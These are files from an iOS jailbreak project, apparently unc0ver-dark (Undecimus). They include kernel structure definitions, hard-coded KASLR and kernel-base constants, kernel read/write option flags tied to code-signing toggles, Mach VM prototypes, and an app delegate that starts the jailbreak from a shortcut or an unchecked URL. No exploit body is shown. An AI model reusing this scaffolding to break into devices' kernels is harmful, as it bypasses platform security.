42 | typedef struct mach_header_64 mach_hdr_t;
43 | typedef struct segment_command_64 mach_seg_t;
44 | typedef struct load_command mach_lc_t;
45 | typedef uint64_t kptr_t; // kernel addresses are carried as plain 64-bit integers, not as C pointers
46 | #define KPTR_NULL ((kptr_t) 0)
47 | #define KERN_POINTER_VALID(val) ((val) >= 0xffff000000000000 && (val) != 0xffffffffffffffff) // range check only: top 16 bits set and not all-ones; it does not show that the address is mapped
48 | #define MAX_KASLR_SLIDE 0x21000000 // NOTE(review): hard-coded; presumably tied to particular kernel builds — confirm
49 | #define STATIC_KERNEL_BASE_ADDRESS 0xfffffff007004000 // NOTE(review): hard-coded; presumably tied to particular kernel builds — confirm
50 | // Option flags are bits in a word stored at the address held in offset_options; rk64/wk64 (declared elsewhere) read and write that word.
51 | extern kptr_t offset_options;
52 | #define OPT(x) (offset_options?((rk64(offset_options) & OPT_ ##x)?true:false):false) // false whenever offset_options is 0
53 | #define SETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) | OPT_ ##x):0) // a read followed by a separate write; skipped when offset_options is 0
54 | #define UNSETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) & ~OPT_ ##x):0) // clears the bit the same way
55 | #define OPT_GET_TASK_ALLOW (1<<0) // NOTE(review): the name suggests a code-signing-related toggle; its effect is decided by whatever consumes this word, which is not visible here
56 | #define OPT_CS_DEBUGGED (1<<1) // NOTE(review): same caveat as the flag above
58 | #endif
59 |
60 |
--------------------------------------------------------------------------------
/Undecimus/include/ipc_port.h:
--------------------------------------------------------------------------------
1 | /*
2 | * ipc_port.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__IPC_PORT_H_
6 | #define VOUCHER_SWAP__IPC_PORT_H_
7 |
8 | #include
9 | #include
10 |
11 | // ---- osfmk/kern/waitq.h ------------------------------------------------------------------------
12 | // Width of the waitq_eventmask field: the 32-bit flags word minus the 7 bits used by the fields declared before it.
13 | #define _EVENT_MASK_BITS ((sizeof(uint32_t) * 8) - 7)
14 |
15 | #define WQT_QUEUE 0x2
16 | // Overlays the packed bitfields on the raw 32-bit word; bitfield placement is compiler-defined, so the two views agree only under a matching ABI.
17 | union waitq_flags {
18 | struct {
19 | uint32_t /* flags */
20 | waitq_type:2, /* only public field */
21 | waitq_fifo:1, /* fifo wakeup policy? */
22 | waitq_prepost:1, /* waitq supports prepost? */
23 | waitq_irq:1, /* waitq requires interrupts disabled */
24 | waitq_isvalid:1, /* waitq structure is valid */
25 | waitq_turnstile_or_port:1, /* waitq is embedded in a turnstile (if irq safe), or port (if not irq safe) */
26 | waitq_eventmask:_EVENT_MASK_BITS;
27 | };
28 | uint32_t flags;
29 | };
30 |
31 | // ---- osfmk/kern/ipc_kobject.h ------------------------------------------------------------------
32 | // Kernel object type codes; the section header names osfmk/kern/ipc_kobject.h as their origin.
33 | #define IKOT_NONE 0
34 | #define IKOT_TASK 2
35 |
36 | // ---- osfmk/ipc/ipc_object.h --------------------------------------------------------------------
37 |
38 | #define IO_BITS_KOTYPE 0x00000fff /* used by the object */
39 | #define IO_BITS_ACTIVE 0x80000000 /* is object alive? */
40 | // Packs the active flag (bit 31), the object type (shifted to bit 16 and up) and the kobject type (low bits) into one word; otype and kotype are not masked here.
41 | #define io_makebits(active, otype, kotype) \
42 | (((active) ? IO_BITS_ACTIVE : 0) | ((otype) << 16) | (kotype))
43 |
44 | #define IOT_PORT 0
45 |
46 | // ---- Custom definitions ------------------------------------------------------------------------
47 | // Evaluates to 8: twice the size difference between uint64_t and uint32_t.
48 | #define MACH_HEADER_SIZE_DELTA (2 * (sizeof(uint64_t) - sizeof(uint32_t)))
49 |
50 | // ------------------------------------------------------------------------------------------------
51 |
52 | #endif
53 |
--------------------------------------------------------------------------------
/Undecimus/include/libproc.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 2006, 2007 Apple Inc. All rights reserved.
3 | *
4 | * @APPLE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. Please obtain a copy of the License at
10 | * http://www.opensource.apple.com/apsl/ and read it before using this
11 | * file.
12 | *
13 | * The Original Code and all software distributed under the License are
14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
18 | * Please see the License for the specific language governing rights and
19 | * limitations under the License.
20 | *
21 | * @APPLE_LICENSE_HEADER_END@
22 | */
23 | #ifndef _LIBPROC_H_
24 | #define _LIBPROC_H_
25 |
26 | #include
27 | #include
28 | #include
29 | #include
30 | #include
31 | #include
32 |
33 | #include
34 |
35 | /*
36 | * This header file contains private interfaces to obtain process information.
37 | * These interfaces are subject to change in future releases.
38 | */
39 |
40 | /*!
41 | @define PROC_LISTPIDSPATH_PATH_IS_VOLUME
42 | @discussion This flag indicates that all processes that hold open
43 | file references on the volume associated with the specified
44 | path should be returned.
45 | */
46 | #define PROC_LISTPIDSPATH_PATH_IS_VOLUME 1
47 |
48 |
49 | /*!
50 | @define PROC_LISTPIDSPATH_EXCLUDE_EVTONLY
51 | @discussion This flag indicates that file references that were opened
52 | with the O_EVTONLY flag should be excluded from the matching
53 | criteria.
54 | */
55 | #define PROC_LISTPIDSPATH_EXCLUDE_EVTONLY 2
56 |
57 | __BEGIN_DECLS
58 | // Fills 'buffer' (buffersize bytes) with process identifiers selected by type/typeinfo; the buffer convention is described for proc_listpidspath below.
59 | int proc_listpids(uint32_t type, uint32_t typeinfo, void *buffer, int buffersize);
60 |
61 | /*!
62 | @function proc_listpidspath
63 | @discussion A function which will search through the current
64 | processes looking for open file references which match
65 | a specified path or volume.
66 | @param type types of processes to be searched (see proc_listpids)
67 | @param typeinfo adjunct information for type
68 | @param path file or volume path
69 | @param pathflags flags to control which files should be considered
70 | during the process search.
71 | @param buffer a C array of int-sized values to be filled with
72 | process identifiers that hold an open file reference
73 | matching the specified path or volume. Pass NULL to
74 | obtain the minimum buffer size needed to hold the
75 | currently active processes.
76 | @param buffersize the size (in bytes) of the provided buffer.
77 | @result the number of bytes of data returned in the provided buffer;
78 | -1 if an error was encountered;
79 | */
80 | int proc_listpidspath(uint32_t type,
81 | uint32_t typeinfo,
82 | const char *path,
83 | uint32_t pathflags,
84 | void *buffer,
85 | int buffersize);
86 | // Each call below writes into a caller-supplied buffer: pass the real allocation size as buffersize and check the int result before reading the contents.
87 | int proc_pidinfo(int pid, int flavor, uint64_t arg, void *buffer, int buffersize);
88 | int proc_pidfdinfo(int pid, int fd, int flavor, void * buffer, int buffersize);
89 | int proc_name(int pid, void * buffer, uint32_t buffersize);
90 | int proc_regionfilename(int pid, uint64_t address, void * buffer, uint32_t buffersize);
91 | int proc_kmsgbuf(void * buffer, uint32_t buffersize);
92 | int proc_pidpath(int pid, void * buffer, uint32_t buffersize);
93 | int proc_libversion(int *major, int * minor); // reports the library version through the two out-parameters
94 |
95 | __END_DECLS
96 |
97 | #endif /*_LIBPROC_H_ */
98 |
--------------------------------------------------------------------------------
/Undecimus/include/mach_vm.h:
--------------------------------------------------------------------------------
1 | /*
2 | * mach_vm.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__MACH_VM_H_
6 | #define VOUCHER_SWAP__MACH_VM_H_
7 |
8 | #include
9 |
/*
 * Local prototypes for the Mach VM calls used by this project.
 * Each call operates on the address space named by its first argument, so
 * what the caller can reach is decided entirely by which task port it
 * holds a send right for. Every call returns KERN_SUCCESS on success.
 */

/* Allocate `size` bytes in `target`; the chosen address is returned through `address`. */
extern kern_return_t mach_vm_allocate(vm_map_t target,
                                      mach_vm_address_t *address,
                                      mach_vm_size_t size,
                                      int flags);

/* Release the range [address, address + size) in `target`. */
extern kern_return_t mach_vm_deallocate(vm_map_t target,
                                        mach_vm_address_t address,
                                        mach_vm_size_t size);

/* Copy `dataCnt` bytes from the caller's buffer `data` to `address` in `target_task`. */
extern kern_return_t mach_vm_write(vm_map_t target_task,
                                   mach_vm_address_t address,
                                   vm_offset_t data,
                                   mach_msg_type_number_t dataCnt);

/*
 * Copy `size` bytes from `address` in `target_task` into the caller's
 * buffer at `data`; the number of bytes actually copied is stored in
 * `*outsize`. The caller must supply a buffer of at least `size` bytes.
 */
extern kern_return_t mach_vm_read_overwrite(vm_map_t target_task,
                                            mach_vm_address_t address,
                                            mach_vm_size_t size,
                                            mach_vm_address_t data,
                                            mach_vm_size_t *outsize);
46 | #endif
47 |
--------------------------------------------------------------------------------
/Undecimus/include/reboot.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 2000-2006 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | /* Copyright (c) 1995 NeXT Computer, Inc. All Rights Reserved */
29 | /*
30 | * Copyright (c) 1982, 1986, 1988, 1993, 1994
31 | * The Regents of the University of California. All rights reserved.
32 | *
33 | * Redistribution and use in source and binary forms, with or without
34 | * modification, are permitted provided that the following conditions
35 | * are met:
36 | * 1. Redistributions of source code must retain the above copyright
37 | * notice, this list of conditions and the following disclaimer.
38 | * 2. Redistributions in binary form must reproduce the above copyright
39 | * notice, this list of conditions and the following disclaimer in the
40 | * documentation and/or other materials provided with the distribution.
41 | * 3. All advertising materials mentioning features or use of this software
42 | * must display the following acknowledgement:
43 | * This product includes software developed by the University of
44 | * California, Berkeley and its contributors.
45 | * 4. Neither the name of the University nor the names of its contributors
46 | * may be used to endorse or promote products derived from this software
47 | * without specific prior written permission.
48 | *
49 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
50 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
51 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
52 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
53 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
54 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
55 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
56 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
57 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
58 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
59 | * SUCH DAMAGE.
60 | *
61 | * @(#)reboot.h 8.3 (Berkeley) 12/13/94
62 | */
63 |
64 | #ifndef _SYS_REBOOT_H_
65 | #define _SYS_REBOOT_H_
66 |
67 | #include
68 | #include
69 | #include
70 |
71 | /*
72 | * Arguments to reboot system call.
73 | */
74 |
75 | #ifdef __APPLE_API_PRIVATE
76 | #define RB_AUTOBOOT 0 /* flags for system auto-booting itself */
77 |
78 | #define RB_ASKNAME 0x01 /* ask for file name to reboot from */
79 | #define RB_SINGLE 0x02 /* reboot to single user only */
80 | #define RB_NOSYNC 0x04 /* dont sync before reboot */
81 | #define RB_HALT 0x08 /* don't reboot, just halt */
82 | #define RB_INITNAME 0x10 /* name given for /etc/init */
83 | #define RB_DFLTROOT 0x20 /* use compiled-in rootdev */
84 | #define RB_ALTBOOT 0x40 /* use /boot.old vs /boot */
85 | #define RB_UNIPROC 0x80 /* don't start slaves */
86 | #define RB_SAFEBOOT 0x100 /* booting safe */
87 | #define RB_UPSDELAY 0x200 /* Delays restart by 5 minutes */
88 | #define RB_QUICK 0x400 /* quick and ungraceful reboot with file system caches flushed*/
89 | #define RB_PANIC 0x800 /* panic the kernel */
90 |
91 | #ifndef KERNEL
92 | __BEGIN_DECLS
93 | /* userspace reboot control */
94 | int usrctl(uint32_t flags);
95 | /* The normal reboot syscall. */
96 | int reboot(int howto);
97 | /* Used with RB_PANIC to panic the kernel from userspace with a message.
98 | * Requires an entitlement on Release. */
99 | int reboot_np(int howto, const char *message);
100 | __END_DECLS
101 | #endif
102 |
103 | #endif /* __APPLE_API_PRIVATE */
104 |
105 | #ifdef __APPLE_API_OBSOLETE
106 | /*
107 | * Constants for converting boot-style device number to type,
108 | * adaptor (uba, mba, etc), unit number and partition number.
109 | * Type (== major device number) is in the low byte
110 | * for backward compatibility. Except for that of the "magic
111 | * number", each mask applies to the shifted value.
112 | * Format:
113 | * (4) (4) (4) (4) (8) (8)
114 | * --------------------------------
115 | * |MA | AD| CT| UN| PART | TYPE |
116 | * --------------------------------
117 | */
118 | #define B_ADAPTORSHIFT 24
119 | #define B_ADAPTORMASK 0x0f
120 | #define B_ADAPTOR(val) (((val) >> B_ADAPTORSHIFT) & B_ADAPTORMASK)
121 | #define B_CONTROLLERSHIFT 20
122 | #define B_CONTROLLERMASK 0xf
123 | #define B_CONTROLLER(val) (((val)>>B_CONTROLLERSHIFT) & B_CONTROLLERMASK)
124 | #define B_UNITSHIFT 16
125 | #define B_UNITMASK 0xff
126 | #define B_UNIT(val) (((val) >> B_UNITSHIFT) & B_UNITMASK)
127 | #define B_PARTITIONSHIFT 8
128 | #define B_PARTITIONMASK 0xff
129 | #define B_PARTITION(val) (((val) >> B_PARTITIONSHIFT) & B_PARTITIONMASK)
130 | #define B_TYPESHIFT 0
131 | #define B_TYPEMASK 0xff
132 | #define B_TYPE(val) (((val) >> B_TYPESHIFT) & B_TYPEMASK)
133 | #define B_MAGICMASK 0xf0000000
134 | #define B_DEVMAGIC 0xa0000000
135 |
136 | #define MAKEBOOTDEV(type, adaptor, controller, unit, partition) \
137 | (((type) << B_TYPESHIFT) | ((adaptor) << B_ADAPTORSHIFT) | \
138 | ((controller) << B_CONTROLLERSHIFT) | ((unit) << B_UNITSHIFT) | \
139 | ((partition) << B_PARTITIONSHIFT) | B_DEVMAGIC)
140 |
141 | #endif /* __APPLE_API_OBSOLETE */
142 |
143 | #endif /* _SYS_REBOOT_H_ */
144 |
--------------------------------------------------------------------------------
/Undecimus/resources/Menlo-Regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/Menlo-Regular.ttf
--------------------------------------------------------------------------------
/Undecimus/resources/Painting_With_Chocolate.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/Painting_With_Chocolate.ttf
--------------------------------------------------------------------------------
/Undecimus/resources/binpack64-256.tar.lzma:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/binpack64-256.tar.lzma
--------------------------------------------------------------------------------
/Undecimus/resources/darkmeridian.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/darkmeridian.png
--------------------------------------------------------------------------------
/Undecimus/resources/darkmeridian@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/darkmeridian@2x.png
--------------------------------------------------------------------------------
/Undecimus/resources/darkmeridian@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/darkmeridian@3x.png
--------------------------------------------------------------------------------
/Undecimus/resources/lists.tar.lzma:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/lists.tar.lzma
--------------------------------------------------------------------------------
/Undecimus/resources/meridian.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/meridian.png
--------------------------------------------------------------------------------
/Undecimus/resources/meridian@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/meridian@2x.png
--------------------------------------------------------------------------------
/Undecimus/resources/meridian@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/meridian@3x.png
--------------------------------------------------------------------------------
/Undecimus/resources/purple.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/purple.png
--------------------------------------------------------------------------------
/Undecimus/resources/purple@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/purple@2x.png
--------------------------------------------------------------------------------
/Undecimus/resources/purple@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/purple@3x.png
--------------------------------------------------------------------------------
/Undecimus/resources/white.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/white.png
--------------------------------------------------------------------------------
/Undecimus/resources/white@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/white@2x.png
--------------------------------------------------------------------------------
/Undecimus/resources/white@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/white@3x.png
--------------------------------------------------------------------------------
/Undecimus/source/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // Undecimus
4 | //
5 | // Created by pwn20wnd on 8/29/18.
6 | // Copyright © 2018 - 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface AppDelegate : UIResponder
12 |
13 | @property (strong, nonatomic) UIWindow *window;
14 | @property (strong, atomic) NSPipe *combinedPipe;
15 | @property (assign) int orig_stderr;
16 | @property (assign) int orig_stdout;
17 |
18 | @end
19 |
20 |
--------------------------------------------------------------------------------
/Undecimus/source/AppDelegate.m:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.m
3 | // Undecimus
4 | //
5 | // Created by pwn20wnd on 8/29/18.
6 | // Copyright © 2018 - 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #include
10 | #import "AppDelegate.h"
11 | #include "JailbreakViewController.h"
12 | #include "SettingsTableViewController.h"
13 | #include "utils.h"
14 | #include "prefs.h"
15 |
16 | @interface AppDelegate ()
17 |
18 | @end
19 |
20 | @implementation AppDelegate
21 |
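/**
 * Creates the delegate and reroutes the process's stdout and stderr into an
 * in-process pipe, then starts a background thread (`handlePipe`) that
 * drains the pipe.
 *
 * Duplicates of the original descriptors are kept in `_orig_stdout` and
 * `_orig_stderr` so the captured output can still be forwarded to them.
 *
 * NOTE(review): the results of dup() and dup2() are not checked. If dup()
 * fails, the saved descriptor is -1 and forwarding in
 * `readDataFromFD:toFD:` fails silently.
 *
 * @return the initialised delegate, or nil if the superclass initialiser failed.
 */
-(AppDelegate*)init {
    self = [super init];
    // The ivars below are accessed directly, which dereferences self;
    // stop here if the superclass returned nil.
    if (self == nil) {
        return nil;
    }

    enableLogging();
    _combinedPipe = [NSPipe pipe];

    // Save the real stdout/stderr before they are replaced.
    _orig_stdout = dup(STDOUT_FILENO);
    _orig_stderr = dup(STDERR_FILENO);

    // Both streams share the pipe's write end, so their output is interleaved.
    int pipeWriteFd = _combinedPipe.fileHandleForWriting.fileDescriptor;
    dup2(pipeWriteFd, STDOUT_FILENO);
    dup2(pipeWriteFd, STDERR_FILENO);

    [self performSelectorInBackground:@selector(handlePipe) withObject:nil];
    return self;
}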
33 |
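/**
 * Reads one chunk (at most 64 KiB) from `infd`, mirrors it to `outfd` and,
 * when the global `logfd` is open, to the log file.
 *
 * Everything the process prints passes through here, so the log file
 * receives the same content as the console; handle it accordingly if the
 * output can contain device-specific details.
 *
 * @param infd  descriptor to read from (the read end of the capture pipe).
 * @param outfd descriptor the raw bytes are forwarded to.
 * @return the chunk decoded as UTF-8, or nil when read() returned no data
 *         or failed. nil is also returned when the bytes are not valid
 *         UTF-8 (for example a multi-byte character split across two
 *         reads); the caller cannot tell these cases apart.
 */
-(NSString*)readDataFromFD:(int)infd toFD:(int)outfd {
    char s[0x10000];

    ssize_t nread = read(infd, s, sizeof(s));
    if (nread <= 0)
        return nil;

    // Forwarding is best-effort: a short or failed write is not retried.
    (void)write(outfd, s, nread);
    if (logfd > 0) {
        if (write(logfd, s, nread) != nread) {
            static const char msg[] = "error writing to logfile\n";
            // sizeof(msg) - 1 leaves out the terminating NUL; the previous
            // hard-coded length of 26 wrote it to stderr as well.
            (void)write(_orig_stderr, msg, sizeof(msg) - 1);
        }
    }
    return [[NSString alloc] initWithBytes:s length:nread encoding:NSUTF8StringEncoding];
}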
49 |
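/**
 * Background loop that drains the stdout/stderr capture pipe.
 *
 * Each chunk is forwarded by `readDataFromFD:toFD:` and appended to a
 * pending buffer; whenever the buffer holds at least one complete line,
 * everything up to and including the last newline is handed to
 * `JailbreakViewController` and removed from the buffer.
 *
 * The loop must keep running for the lifetime of the process: stdout and
 * stderr point at the pipe, so once nobody drains it and its buffer fills,
 * every write to those streams blocks.
 *
 * NOTE(review): `appendTextToOutput:` is called from this background
 * thread; confirm it hops to the main thread before touching UIKit.
 * NOTE(review): a nil chunk also covers end-of-file, in which case this
 * loop would spin; that needs the write end to be closed everywhere.
 */
- (void)handlePipe {
    NSMutableString *pending = [NSMutableString new];
    int input_fd = _combinedPipe.fileHandleForReading.fileDescriptor;

    // FD_SET on a descriptor outside [0, FD_SETSIZE) writes outside the fd_set.
    if (input_fd < 0 || input_fd >= FD_SETSIZE) {
        return;
    }

    for (;;) {
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(input_fd, &fds);

        int rv = select(input_fd + 1, &fds, NULL, NULL, NULL);
        if (rv < 0) {
            // A signal interrupting select() must not end the pump; the
            // fd_set is unspecified after an error, so it is not inspected.
            if (errno == EINTR)
                continue;
            break;
        }
        if (rv == 0)
            break;
        if (!FD_ISSET(input_fd, &fds))
            continue;

        NSString *chunk = [self readDataFromFD:input_fd toFD:_orig_stdout];
        if (chunk == nil)
            continue;
        [pending appendString:chunk];

        NSRange lastNewline = [chunk rangeOfString:@"\n" options:NSBackwardsSearch];
        if (lastNewline.location == NSNotFound)
            continue;

        // Translate the newline's position in the chunk into a position in
        // the pending buffer, then flush everything up to and including it.
        NSUInteger newlineInPending = pending.length - (chunk.length - lastNewline.location);
        NSRange wanted = NSMakeRange(0, newlineInPending + 1);
        [JailbreakViewController.sharedController appendTextToOutput:[pending substringWithRange:wanted]];
        [pending deleteCharactersInRange:wanted];
    }
}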
76 |
/**
 * Launch hook: loads preferences, registers the home-screen shortcut,
 * shows the status bar and keeps the screen from auto-locking while the
 * app is in the foreground.
 *
 * @return always YES.
 */
- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
    [self initPrefs];
    [self initShortcuts];

    UIApplication *sharedApp = UIApplication.sharedApplication;
    sharedApp.statusBarHidden = NO;
    // Disabling the idle timer stops the device from sleeping mid-run.
    sharedApp.idleTimerDisabled = YES;
    return YES;
}
85 |
86 |
/**
 * Prepares the preference store: registers the defaults first, then runs
 * the repair pass. Both helpers are declared outside this file (presumably
 * in prefs.h); the order is kept as written.
 */
- (void)initPrefs {
    register_default_prefs();
    repair_prefs();
}
91 |
/**
 * Installs the single dynamic home-screen quick action.
 *
 * The item's type string is @"1"; `application:performActionForShortcutItem:`
 * converts it to an integer to decide which action to run.
 */
- (void)initShortcuts {
    UIApplicationShortcutIcon *icon = [UIApplicationShortcutIcon iconWithTemplateImageName:@"maintenance"];
    UIApplicationShortcutItem *jailbreakItem =
        [[UIApplicationShortcutItem alloc] initWithType:@"1"
                                         localizedTitle:@"Jailbreak"
                                      localizedSubtitle:nil
                                                   icon:icon
                                               userInfo:nil];
    UIApplication.sharedApplication.shortcutItems = @[ jailbreakItem ];
}
99 |
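/**
 * Handles a home-screen quick action.
 *
 * The shortcut type is parsed as an integer; type 1 runs the same action
 * as the main button (`tappedOnJailbreak:`) on the main thread and waits
 * for it to return. Any other type is ignored.
 *
 * @param completionHandler UIKit's callback; it is now always invoked, with
 *        YES when the shortcut was recognised and NO otherwise. The
 *        previous code never called it.
 */
- (void)application:(UIApplication *)application performActionForShortcutItem:(UIApplicationShortcutItem *)shortcutItem completionHandler:(void (^)(BOOL))completionHandler {
    BOOL handled = NO;

    switch ([[shortcutItem type] integerValue]) {
        case 1: {
            [[JailbreakViewController sharedController] performSelectorOnMainThread:@selector(tappedOnJailbreak:) withObject:nil waitUntilDone:YES];
            handled = YES;
            break;
        }
        default:
            break;
    }

    if (completionHandler != nil) {
        completionHandler(handled);
    }
}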
110 |
/**
 * Custom URL scheme entry point. Only the exact URL
 * "unc0ver-dark://jailbreak" is accepted; it runs `tappedOnJailbreak:` on
 * the main thread and waits for it to return.
 *
 * NOTE(review): `options` is never consulted, so the request is honoured
 * no matter which app opened the URL, and this method shows no
 * confirmation before the action runs. Whether `tappedOnJailbreak:` itself
 * asks the user is not visible here. A handler that starts a privileged,
 * device-altering action should check
 * UIApplicationOpenURLOptionsSourceApplicationKey or require an explicit
 * in-app confirmation.
 *
 * @return YES when the URL was recognised and acted on, NO otherwise.
 */
- (BOOL)application:(UIApplication *)app openURL:(NSURL *)url options:(NSDictionary *)options {
    BOOL isJailbreakRequest = [url.absoluteString isEqualToString:@"unc0ver-dark://jailbreak"];
    if (!isJailbreakRequest) {
        return NO;
    }

    [[JailbreakViewController sharedController] performSelectorOnMainThread:@selector(tappedOnJailbreak:) withObject:nil waitUntilDone:YES];
    return YES;
}
118 |
119 | - (void)applicationWillResignActive:(UIApplication *)application {
120 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
121 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
122 | }
123 |
124 |
125 | - (void)applicationDidEnterBackground:(UIApplication *)application {
126 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
127 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
128 | }
129 |
130 |
131 | - (void)applicationWillEnterForeground:(UIApplication *)application {
132 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
133 | }
134 |
135 |
136 | - (void)applicationDidBecomeActive:(UIApplication *)application {
137 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
138 | }
139 |
140 |
141 | - (void)applicationWillTerminate:(UIApplication *)application {
142 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
143 | }
144 |
145 |
146 | @end
147 |
--------------------------------------------------------------------------------
/Undecimus/source/ArchiveFile.h:
--------------------------------------------------------------------------------
1 | //
2 | // Archive.h
3 | //
4 | // Created by Sam Bingner on 1/4/19.
5 | // Copyright © 2019 Sam Bingner. All rights reserved.
6 | //
7 |
8 | #ifndef _ARCHIVE_FILE_H
9 | #define _ARCHIVE_FILE_H
10 | #import
11 | #import
12 |
/**
 * Wrapper around an archive that can be opened from a path or from an
 * already-open file descriptor, queried for its entries, and extracted.
 *
 * NOTE(review): the implementation is not part of this header. The
 * extraction methods take a destination path, flags, an overwrite switch
 * and an owner/group, so when the archive is not fully trusted the
 * implementation should be checked for how it treats entry names that
 * point outside the destination (absolute paths, "..", symlinks).
 */
@interface ArchiveFile : NSObject

/** Entries of the archive; the key and value layout is defined by the implementation. */
@property (strong,readonly) NSDictionary *files;

